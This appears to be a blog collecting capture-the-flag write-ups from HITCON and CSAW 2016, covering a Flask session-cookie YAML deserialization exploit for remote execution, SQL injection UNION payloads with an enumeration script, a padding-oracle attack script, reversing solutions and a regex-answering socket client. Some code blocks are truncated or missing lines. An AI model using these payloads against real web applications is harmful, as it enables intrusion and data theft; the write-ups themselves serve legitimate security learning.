app = App()  
app.secret_key = key

# Encode a session exactly how Flask would do it
si = SecureCookieSessionInterface()  
serializer = si.get_signing_serializer(app)  
session = serializer.dumps(exploit)

print("Change your session cookie to: ")  

# Test it on ourselves
#x = serializer.loads(session)

All we really need is some YAML code that does something malicious. This Redhat Article explains how to do a Python subprocess.call() with YAML, so we can leverage that to get remote execution. Next we need to form our session into a shape that the webapp likes, so that means making it into the correct dictionary with 'post_type' and 'post_data'.

After we have that session ready, we have to encode it using the same scheme that Flask does. This was easier to do than expected. We can then change our session cookie to the string that a real Flask app would do.

Refresh the page... - - [10/Oct/2016:05:02:55 +0300] "GET /hitcon%7Bunseriliaze_is_dangerous_but_RCE_is_fun!!%7D HTTP/1.1" 301 184 "-" "Wget/1.17.1 (linux-gnu)"  

Are you rich?

Web 50

Description Are you rich? Buy the flag!
ps. You should NOT pay anything for this challenge
Some error messages which is non-related to challenge have been removed

Navigate to verify.php, and for address:

d' AND 1=2 UNION ALL SELECT table_name from information_schema.tables LIMIT 3,1 #  

Change the limit to output a different table_name, and keep enumerating to find the table named flag.

I made a tester script:

import requests

URL = ''

for i in range(0, 100):  
    address = r"d' AND 1=2 UNION ALL SELECT table_name from information_schema.tables LIMIT {},1 #".format(str(i))
    data = {'address': address,
            'flag_id': 'flag2',
             'submit': 1}

    r = requests.post(URL, data=data)

    if 'not have enough' not in r.text:

Then do

d' AND 1=2 UNION ALL SELECT flag from flag1 #  

And get ...

Error!: Remote API server reject your invalid address 'hitcon{4r3_y0u_r1ch?ju57_buy_7h3_fl4g!!}'. If your address is valid, please PM @cebrusfs or other admin on IRC.  

CSAW Qual CTF 2016 Writeups

The team/club I organize at Boston University just got done competing in the CSAW Qual CTF 2016. It was a bunch of fun, and we came in 119th out of 1274 active teams, top 10%!


Here's some writeups of the challenges I worked on. Other people's writeups can be found at https://0xbu.com/writeups.



(Crypto 200)

The challenge was a basic padding oracle attack. A padding oracle attack is present when: 1) A server attempts decryption with padding on controllable data, and 2) The server returns different a different result (i.e. error message) if the cipher text did not unpad correctly (i.e. an oracle). By attempting decryption of specially crafted data, the oracle reveals if unpadding was successful. From that oracle the plaintext can be recovered without the original key.

The challenge presents to you a website that states "Decrypt the matrix", and an input box that generates a new seemingly random base64 string on refresh. Playing around with submitting the box prints a different message depending on the input, either:

  1. Nothing
  2. AES Exception Thrown
  3. Invalid Base64

The random generated base64 string always returns "Nothing", meaning it probably worked successfully.

So there's a few hints here to tell you what to do:

  • "Decrypt the matrix" - Probably have to decrypt something.
  • The Matrix has a very important character named "The Oracle".
  • We get thrown 2 different messages depending on if our input succeeded, or didn't - ala we have an oracle.

So putting those pieces together, this is clearly a Padding Oracle exploit exercise.

This was my first padding oracle exploit. The best website while trying to learn this attack for the challenge was: http://robertheaton.com/2013/07/29/padding-oracle-attack/

From that, I then found some things already built for crafting/testing differently crafted data. I choose, https://github.com/mwielgoszewski/python-paddingoracle (I also have it easily installable in my sec-tools), as the best one for me. It's a nice Python API, where basically all you have to do is define an oracle function, and make it either Throw a 'BadPaddingException' based on your own logic for what throws that, or make it return successfully. The logic to throw a BadPaddingException can be actual crypto, or it can be a web request, it just has to be logic that causes an oracle to speak.

from paddingoracle import BadPaddingException, PaddingOracle  
from base64 import b64encode, b64decode  
from urllib import quote, unquote  
import requests  
import socket  
import time

class PadBuster(PaddingOracle):  
    def __init__(self, **kwargs):
        super(PadBuster, self).__init__(**kwargs)

    def oracle(self, data, **kwargs):
        print("[*] Trying: {}".format(b64encode(data)))

        # Do Crypto that throws something different if padding error
        r = requests.post('http://crypto.chal.csaw.io:8001/', data={'matrix-id':b64encode(data)})

        if 'AES' in r.text:
            print ("[*] Padding error!")
            raise BadPaddingException
            print ("[*] No padding error")

if __name__ == '__main__':  
    import logging
    import sys

    # This is a random string the server printed for us, 
    # assuming have to decrypt this, and see what we get
    encrypted_value = 'XImKWrDW5dFvUVDuwbwLy+nHJmDClEXWLcJRmf44atNU2tKZcVFoyT81bmUkL6WPWg7Dn8HMeeWwhiC+CI8QhDtYqGCBidtHZ+alNqnyTn4='
    padbuster = PadBuster()

    value = padbuster.decrypt(b64decode(encrypted_value), block_size=16, iv=bytearray(16))

    print('Decrypted: %s => %r' % (encrypted_value, value))

It's kind of deceptive in the challenge how a new random base64 string is printed to you on every website refresh. Because of that it can be difficult to figure out what you're supposed to decrypt. I ended up actually editing python-paddingoracle to also print the 'IV' (see the padding oracle article above, but basically IV = intermediate value ^ decrypted 1st block). I saw that the IV was \00*16 (typical default for CBC), so that gave me hope that I was on the right path, and that this really was some usefully encrypted data, and that my padding oracle attack was in fact working.

Running the script, and waiting about 30 minutes gets the flag:

Decrypted: XImKWrDW5dFvUVDuwbwLy+nHJmDClEXWLcJRmf44atNU2tKZcVFoyT81bmUkL6WPWg7Dn8HMeeWwhiC+CI8QhDtYqGCBidtHZ+alNqnyTn4= => bytearray(b'\xeeX6\x0c\x99\xb1\xed\x0c4!\xcf\xf0w\xf8u_flag{what_if_i_told_you_you_solved_the_challenge}\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f\x0f')  

The Rock

(Reversing 100)

Fairly straight forward ELF64 C++ reverse engineering. Using a mix of static, and dynamic tools you can get a feel of what the program is doing. It was mostly figuring out which functions do something useful.

In this challenge we're give an ELF64 binary. Opening it up in IDA reveals the main function, and that it's written in C++, which means there's going to be a lot more garbage data (virtualism, object-oriented, std library, etc. cruft) to sift through.

There's 3 ways to go down from this:

  1. Purely static analysis - Figure out what each function does, if it's useful or not, typically starting by backtracking from the function that looks most likely to be a validate function. There should be an algorithm that some how compares some form of the input key, to some form of the known good key. The algorithm maybe tricky, and the keys may be shuffled in all sorts of ways, but it boils down to essentially a comparison.

  2. Purely dynamic analysis - Input a key, and follow it down the call stack, and find what it's compared to. Feed that known good key as your input key. This will really only work if the input key is compared without any encoding to it.

  3. Some combination of the above 2.

I ended up doing (1), but (2) was the smarter choice as the input key was being compared directly to an encoded known good key, so simply putting a breakpoint, recording that known good key, and passing it as my input key would do the trick.
But, for whatever reason I wrote the code for (1) instead.

#!/usr/bin/env python
"""Original binary (rock.elf) is verifying a key via:

    input_key = <input>
    encoded_key = 'FLAG23456912365453475897834567'
    clean_key = ''
    for c in k:
        tmp = (c+20) ^ 0x50
        clean_key += (c1+9) ^ 0x10

    return input_key == clean_key

So to reverse it you just have to do the opposite to get the clean_key  
and provide that as the input key  
known_good = "FLAG23456912365453475897834567"  
ans = ""

for c in known_good:  
    tmp = (ord(c)-9) ^ 0x10
    ans += chr( (tmp - 20) ^ 0x50) 

# Let's make sure we did this right
should_be_known_good = ""  
for c in ans:  
    tmp = (ord(c) ^ 0x50) + 20
    should_be_known_good += chr((tmp ^ 0x10) + 9)

if known_good == should_be_known_good:  
    print("Round trip successful, printing the flag: ")

Round trip successful, printing the flag:  


(Reversing 125)

Summary: In this challenge you're given a PE32 executable. The executable looks inside of a key file, and compares the contents to an encoded key. The contents of the file are compared as is to the encoded key.

Executing the program gives us:

"W?h?a?t h?a?p?p?e?n?" 

Opening it up in IDA, and searching for that string, and then backtracing for the root cause reveals to us another interesting string:

Executing the program in wine on Linux crashes... apparently the PE32 uses something that wine hasn't implemented, so you really do need to run this on a Windows box.

So it's pretty obvious that file has to exist. The key is probably put into it and compared directly (it is), but you can verify through running the program in a debugger. That's what I ended up doing, but you can actually skip that and solve this quicker by not.

After getting past the error print, spending some more time debugging, and tracking memory flow reviews to us that the algorithm of this program is basically:

1. Encode the string 'themidathemidathem' by XORing it with a constant key  
2. Encode the result from (1) via some more gibberish.  
3. Compare (3) to the input file key.  

We can follow the flow of the program, and find the result of (2):



(Misc 100)

In this challenge you connect to a server, and it prompts you to provide a correct string that will satisfy a regex expression. You must answer with a satisfiable string, and repeat this process until the server spits out the flag.

I googled for 'reverse regex', and ended up finding the python library rstr. It takes in a regex expression, and returns a string that satisfies it, exactly what we want.

import rstr  
import telnetlib  
import socket

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect(("misc.chal.csaw.io", 8001))

s.recv(1024) # junk read

while True:  
    question = s.recv(1024)

    print("Asking for: " + question)

    if 'Irregular' in question: # printed when we messed up
    if 'flag' in question: # hoping this is printed when we're done

    ans = rstr.xeger(question)
    print("Answering: " + ans)
    # The server can't handle '\n' in the middle of an answer
    # as it thinks that's the end of the answer, so we have to ask
    # again for an answer that doesn't have '\n' in it.
    while '\n' in ans[:-1]:
        print('we fucked')
        ans = rstr.xeger(question)
        print("Answering: " + ans)

nc misc.chal.csaw.io 8001  
Can you match these regexes?  
Asking for: [QSIb][QVvVxYxS]+(bernie|clementine)0{8}[aWeyq]ag*[a-z]6J{9}[a-z]{6}[T\D\DR0vAp]*(tiger|clinton){9}(table|table)[8gpy]

Answering: ISYVYSvvvvxSxSQVxVxYvVVxQQxvvYVQSxQxYvxxvxVYxxSVxQvxvxQQVvxxQVvxxQVVYxYSSVVVVvxQvQYvxvVxVVVvQclementine00000000eagggggggggggggggggggggggy6JJJJJJJJJvqcnnyYEp]!l)Z'?wUXrtz!TpGekY`wh_|W=Sdj{iE+~=+IZUSR*XRUpxjswI=dIu:PFRd^VrLy$(j!Z&$Ts+>)[email protected]+)X>BStigerclintontigertigertigerclintonclintonclintontigertable8

[Repeated a bunch more times...]